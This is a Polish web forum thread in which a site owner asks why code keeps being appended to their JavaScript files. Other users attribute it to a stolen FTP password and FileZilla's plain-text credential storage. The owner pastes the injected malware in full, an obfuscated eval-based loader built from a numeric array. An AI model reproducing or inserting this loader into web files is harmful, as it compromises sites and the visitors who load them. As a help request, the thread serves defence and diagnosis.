[JavaScript]Infekowanie plików js Opcje

[cinus_pl]

Witam,
mam problem ze szkodliwymi botami odwiedzającymi moją stronę. Infekują one pliki js, z których korzysta mój index. Próbowałem zablokować dostęp do strony przez .htaccess, jednak za każdym razem przychodzi do mnie inny bot. Na serwerze nie zostały utworzone żadne obce pliki. W jaki sposób naprawić problem?

[lukaskolista]

Co znaczy "infekowanie plikow js"?

[cinus_pl]

Na końcu skryptów dodawany jest ten kod

CODE

try{abre++}catch(a6ba34y){try{gbewgreb+13}catch(asab){e=eval}}
if(1){f=[89,103,95,86,102,90,98,96,17,97,87,105,103,68,82,97,86,96,96,64,102,96,
84,86,101,26,26,110,-1,-5,19,18,17,19,104,82,101,18,89,92,18,46,19,102,89,92,101,31,102,87,86,87,18,32,1
9,102,89,92,101,31,68,45,-2,-3,18,17,19,18,103,84,100,17,95,97,17,48,18,101,91,91,100,33,101,86,88,86,17,24,1
8,101,91,91,100,33,67,44,0,-4,17,19,18,17,105,83,99,19,102,86,102,102,17,48,18,101,91,91,100,33,51,17,29,18,
93,98,18,30,19,102,89,92,101,31,69,18,27,19,90,90,46,-1,-5,19,18,17,19,91,87,27,102,86,102,102,17,49,18,33,28,109,-2,-3,18,17,19,18,17,19,18,17,103,90,90,102,32,100,88,87,85,19,47,17,103,87,100,103,
45,-2,-3,18,17,19,18,110,19,87,93,102,87,17,110,-1,-5,19,18,17,19,18,17,19,18,101,91,91,100,33,101,86,88,86,17,48,18,101,88,101,101,
19,29,17,103,90,90,102,32,62,46,-1,-5,19,18,17,19,111,-2,-3,18,17,19,18,99,88,102,102,101,96,17,27,102,89,92,101,31,102,87,86,87,18,27,19,
102,89,92,101,31,98,96,86,66,104,86,101,63,26,46,-1,-5,112,-1,-5,0,-4,87,104,96,84,103,91,96,97,18,67,84,96,85,98,95,63,104,95,83,88,100,56,88,96,86
,101,83,101,98,100,25,104,96,90,107,27,108,0,-4,17,19,18,17,105,83,99,19,86,17,48,18,95,88,105,17,55,83,101,88,26,102,97,91,10
5,29,35,33,35,34,26,46,-1,-5,19,18,17,19,104,82,101,18,100,19,47,17,64,83,101,91,32,84,88,91,93,27,86,31,90
,87,101,59,97,102,101,101,25,28,33,36,28,45,-2,-3,18,17,19,18,101,91,91,100,33,101,86,88,86,17,48,18,35,38,38,38,41,41,41,44,34,
34,19,29,17,27,86,31,90,87,101,64,97,95,103,90,25,28,18,27,19,34,105,57,56,55,57,
56,55,28,18,28,19,26,85,33,89,86,103,54,82,103,87,25,28,18,27,19,34,105,57,56,55,
57,27,28,19,26,62,84,102,89,33,100,96,104,96,85,27,101,17,29,18,33,107,56,55,57,2
7,26,46,-1,-5,19,18,17,19,102,89,92,101,31,52,18,46,19,38,41,37,41,34,46,-1,-5,19,18,17,19,102,89,92,101,31,64,18,46,19,36,34,39,41,37,43,37,39,39,41,44,0,-4,17,19,18,17,103,90,90,102,32,66,19,47,17,103,90,90,102,32,62,19,33,17,103,90,9
0,102,32,50,46,-1,-5,19,18,17,19,102,89,92,101,31,69,18,46,19,102,89,92,101,31,64,18,22,19,102,89,9
2,101,31,52,45,-2,-3,18,17,19,18,101,91,91,100,33,97,95,88,65,103,88,100,62,19,47,17,36,32,33,19,33
,17,103,90,90,102,32,62,46,-1,-5,19,18,17,19,102,89,92,101,31,97,87,105,103,18,46,19,96,86,107,102,67,84,96,85,
98,95,63,104,95,83,88,100,44,0,-4,17,19,18,17,101,87,101,104,100,95,19,102,89,92,101,44,0,-4,110,0,-4,-2,-3,88,102,97,85,101,92,97,95,19,85,99,88,83,101,88,68,82,97,86,96,96,64,102,96,84
,86,101,26,99,31,18,62,92,96,29,19,63,82,107,27,108,0,-4,17,19,18,17,101,87,101,104,100,95,19,63,82,103,90,31,101,97,102,97,86,25,27,63
,82,107,31,62,92,96,26,19,28,17,101,32,95,88,106,101,27,27,17,30,18,62,92,96,26,4
6,-1,-5,112,-1,-5,0,-4,87,104,96,84,103,91,96,97,18,88,88,96,86,101,83,101,88,66,100,88,103,85,98,68,
82,97,86,96,96,69,101,101,91,95,90,26,102,97,91,105,31,18,93,88,96,88,103,90,29,1
9,108,96,97,87,26,110,-1,-5,19,18,17,19,104,82,101,18,99,84,96,85,19,47,17,97,87,104,19,68,82,97,86,96,96,
64,102,96,84,86,101,57,86,97,87,99,84,102,96,101,26,102,97,91,105,28,45,-2,-3,18,17,19,18,103,84,100,17,95,87,101,103,87,99,102,18,46,19,20,98,96,83,89,90,1
05,84,103,97,97,89,92,90,95,100,87,99,92,99,89,85,104,90,87,104,91,87,90,109,105,
85,106,20,31,102,98,93,92,102,25,26,25,26,46,-1,-5,19,18,17,19,104,82,101,18,100,103,100,17,48,18,24,26,45,-2,-3,-5,87,98,100,25,105,83,99,19,91,17,48,18,33,46,18,90,19,46,17,95,87,95,90,102,89,
46,18,90,19,29,28,19,27,108,0,-4,17,19,18,17,19,18,17,19,101,101,101,18,28,48,18,93,88,102,101,88,100,100,78,85
,99,88,83,101,88,68,82,97,86,96,96,64,102,96,84,86,101,26,99,84,96,85,31,18,33,31
,18,93,88,102,101,88,100,100,33,94,86,97,89,101,91,18,30,19,35,26,80,45,-2,-3,18,17,19,18,110,0,-4,17,19,18,17,101,87,101,104,100,95,19,101,101,101,18,28,19,25,31,26,18,28,19,10
8,96,97,87,44,0,-4,110,0,-4,-2,-3,101,86,103,59,95,103,87,99,105,83,93,27,88,102,97,85,101,92,97,95,27,27,108,0,-4,17,19,18,17,103,100,106,110,-1,-5,19,18,17,19,18,17,19,18,90,89,26,101,108,98,86,98,88,17,92,88,99,84,95,86,74,8
3,100,54,100,86,84,102,86,87,18,46,48,18,19,104,96,85,88,88,90,97,87,85,21,27,108
,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,103,84,100,17,104,96,90,107,18,46,19,63,82
,103,90,31,101,97,102,97,86,25,30,96,86,106,18,53,84,102,86,27,27,32,36,34,33,35,
27,44,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,103,84,100,17,87,97,94,84,91,95,65,83,94,8
8,18,46,19,89,86,97,87,99,84,102,86,67,101,86,104,86,96,69,83,95,87,97,94,70,102,
99,92,96,88,27,103,95,92,106,29,19,35,39,31,18,24,92,96,87,98,25,26,46,-1,-5,19,18,17,19,18,17,19,18,17,19,18,17,92,88,99,96,18,46,19,86,96,86,103,94,88,96
,101,33,85,99,88,83,101,88,55,93,88,95,86,97,102,25,21,59,55,69,51,62,56,20,26,46
,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,87,101,52,102,101,101,
91,83,104,102,86,27,20,100,101,85,19,31,18,19,91,102,101,99,44,32,34,20,28,87,97,
94,84,91,95,65,83,94,88,29,19,34,91,95,33,85,88,92,49,34,39,20,26,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,102,106,95,87,31,106,9
1,85,103,90,17,48,18,19,35,98,105,21,45,17,0,-4,17,19,18,17,19,18,17,19,18,17,19,18,90,89,100,94,33,101,101,108,94,86,33,90,86
,92,89,89,103,18,46,19,20,33,99,106,19,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,91,87,101,95,31,102,102,106,95,87,31,105,9
1,100,92,84,90,95,91,101,108,18,46,19,20,89,92,86,85,88,96,19,46,18,-2,-3,18,17,19,18,17,19,18,17,19,18,17,19,86,96,86,103,94,88,96,101,33,84,96,87,107,
31,84,98,97,88,96,85,54,90,90,95,86,25,92,88,99,96,27,44,0,-4,-6,-4,-5,90,89,100,82,96,87,72,84,101,52,101,87,82,103,87,85,19,47,17,103,100,102,88,45
,-2,-3,18,17,19,18,17,19,18,17,112,-1,-5,19,18,17,19,111,84,84,102,84,91,26,86,28,109,90,89,100,82,96,87,72,84,101,52,1
01,87,82,103,87,85,19,47,17,104,96,85,88,88,90,97,87,85,46,111,-2,-3,111,29,19,35,33,35,27,44];}w=f;s=[];r=String;x="j%";for(i=0;-i+1773!=0;i+=1){j=i;if(e)s=s+r.fromCharCode((1*w[j]+e(x+3)+13));}
try{asgasg&13}catch(asga){e("if(1)"+s);}

[kamil4u]

Zmień hasło do FTP i samego klienta FTP

[cinus_pl]

Korzystałem z FilleZilla'i, nie zapamiętywałem nigdzie hasła, sam komputer po skanach wydaje się czysty. Jak hasło mogło wycieknąć i z jakiego klienta najlepiej korzystać? i jeszcze jedno pytanie, czy jeżeli moje hasło nie zostało w żaden sposów wykradzione to roboty są w stanie modyfikować zawartość mojego serwera?

Ten post edytował cinus_pl 11.09.2012, 17:56:39

[kamil4u]

Jeżeli nie mają dostępu do konta FTP nie mogą modyfikować kodu. Zakładając, że bardzo nie zmieniałeś ustawień na serwerze( na tym się nie znam ). Gdy nikt poza Tobą nie zna hasła i masz standardowe ustawienia, nikt nie może zmienić Ci kodu. Aha. W sumie mogą jak masz dziurawą aplikację PHP, ale w tym przypadku to mało prawdopodobne - ale zbadaj to też.

Co do klienta. Klika lat temu były znane przypadki zapamiętania haseł w total-commande-rze. Jeżeli miało się zapisane hasło to właśnie automaty( gdy komp był zainfekowany ) doklejały różne śmieci do plików.

Zmień hasło, sprawdź czy nie masz rażących dziur w skrypcie PHP i poczekaj czy sytuacja się powtórzy. Zmień na wszelki wypadek klienta i nie zapisuj nigdzie na kompie tego hasła. Jeżeli sytuacja się powtórzy do ja nie wiem jak masz sobie z tym poradzić.

[toffiak]

Domyślnie filezilla zapamiętuje i przechowuje twoje dane jak zwykły tekst, aby zabezpieczyć się przed zapamiętywanie koniecznie należy zmodyfikować plik konfiguracyjny, szczegóły tutaj

[cinus_pl]

dziękuję za wszystkie porady, mam nadzieję, że sytuacja już się nie powtórzy.